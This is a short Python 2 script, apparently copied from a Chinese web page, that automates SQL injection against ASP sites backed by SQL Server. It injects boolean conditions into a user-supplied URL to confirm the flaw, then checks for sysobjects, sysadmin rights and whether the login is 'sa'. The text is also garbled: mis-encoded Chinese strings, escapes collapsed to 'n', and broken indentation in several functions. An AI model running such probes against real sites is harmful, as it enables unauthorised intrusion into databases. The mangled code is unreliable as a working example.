# Code by zhaoxiaobu Email: little.bu@hotmail.com  
#-*- coding: UTF-8 -*-  
from sys import exit  
from urllib import urlopen  
from string import join,strip  
from re import search  
 
def is_sqlable(): 
  sql1="%20and%201=2" 
  sql2="%20and%201=1" 
  urlfile1=urlopen(url+sql1) 
  urlfile2=urlopen(url+sql2) 
  htmlcodes1=urlfile1.read() 
  htmlcodes2=urlfile2.read() 
  if not search(judge,htmlcodes1) and search(judge,htmlcodes2): 
  print "[信息]恭喜!這個(gè)URL是有注入漏洞的!n" 
  print "[信息]現(xiàn)在判斷數(shù)據(jù)庫(kù)是否是SQL Server,請(qǐng)耐心等候....."  
  is_SQLServer() 
  else: 
  print "[錯(cuò)誤]你確定這個(gè)URL能用?換個(gè)別的試試吧!n"

def is_SQLServer(): 
  sql = "%20and%20exists%20(select%20*%20from%20sysobjects)" 
  urlfile=urlopen(url+sql) 
  htmlcodes=urlfile.read() 
  if not search(judge,htmlcodes): 
  print "[錯(cuò)誤]數(shù)據(jù)庫(kù)好像不是SQL Server的!n" 
  else: 
  print "[信息]確認(rèn)是SQL Server數(shù)據(jù)庫(kù)!n" 
  print "[信息]開(kāi)始檢測(cè)當(dāng)前數(shù)據(jù)庫(kù)用戶權(quán)限,請(qǐng)耐心等待......" 
  is_sysadmin() 
 
 
def is_sysadmin():  
  sql = "%20and%201=(select%20IS_SRVROLEMEMBER('sysadmin'))" 
  urlfile = urlopen(url+sql)  
  htmlcodes = urlfile.read()  
  if not search(judge,htmlcodes):  
    print "[錯(cuò)誤]當(dāng)前數(shù)據(jù)庫(kù)用戶不具有sysadmin權(quán)限!n" 
  else:  
    print "[信息]當(dāng)前數(shù)據(jù)庫(kù)用戶具有sysadmin權(quán)限!n" 
    print "[信息]檢測(cè)當(dāng)前用戶是不是SA,請(qǐng)耐心等待......" 
    is_sa()  
 
def is_sa():  
  sql = "%20and%20'sa'=(select%20System_user)"; 
  urlfile = urlopen(url+sql)  
  htmlcodes = urlfile.read()  
  if not search(judge,htmlcodes):  
    print "[錯(cuò)誤]當(dāng)前數(shù)據(jù)庫(kù)用戶不是SA!n" 
  else:  
    print "[信息]當(dāng)前數(shù)據(jù)庫(kù)用戶是SA!n" 
 
print "n########################################################################n"  
print "            ^o^SQL Server注入利用工具^(guò)o^     "  
print "           Email: little.bu@hotmail.comn"  
print "========================================================================";  
url = raw_input('[信息]請(qǐng)輸入一個(gè)可能有注入漏洞的鏈接!nURL:')  
if url == '':  
  print "[錯(cuò)誤]提供的URL必須具有 '.asp?xxx=' 這樣的格式"  
  exit(1)  
 
judge = raw_input("[信息]請(qǐng)?zhí)峁┮粋€(gè)判斷字符串.n判斷字符串:")  
if judge == '':  
  print "[錯(cuò)誤]判斷字符串不能為空!"  
  exit(1)  
 
is_sqlable()

您可能感興趣的文章: